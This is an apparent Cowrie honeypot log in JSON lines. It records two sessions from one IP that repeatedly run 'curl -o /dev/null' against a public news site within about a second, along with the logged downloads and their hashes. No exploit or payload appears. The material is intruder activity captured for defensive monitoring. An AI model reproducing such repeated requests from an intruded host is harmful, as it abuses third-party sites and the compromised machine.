{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.823567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.824288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.835551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.842489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.843192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.861911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.862690Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.882776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.883318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.896404Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.900742Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.901432Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.905189Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.912020Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.918188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.918986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.924005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.942609Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.943777Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.953295Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.959754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.960470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.979487Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.982498Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.987448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.988328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.995327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.996178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.999684Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.002281Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.004325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.021585Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.029451Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.030168Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.034965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.035652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.071417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.072365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.074906Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.075970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.079777Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.104753Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.110606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.111326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.114181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.114857Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.148690Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.149604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.151800Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.152570Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.185854Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.186726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.191139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.192203Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.207354Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.226206Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.227354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.232781Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.235703Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.236781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.241933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.248154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.259649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.262747Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.266247Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.267738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.268744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.276214Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.276977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.280226Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.304903Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.305827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.318238Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.318995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.335119Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.344344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.345260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.354886Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.356209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.357264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.379680Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.380606Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.401457Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.406548Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.407780Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.416769Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
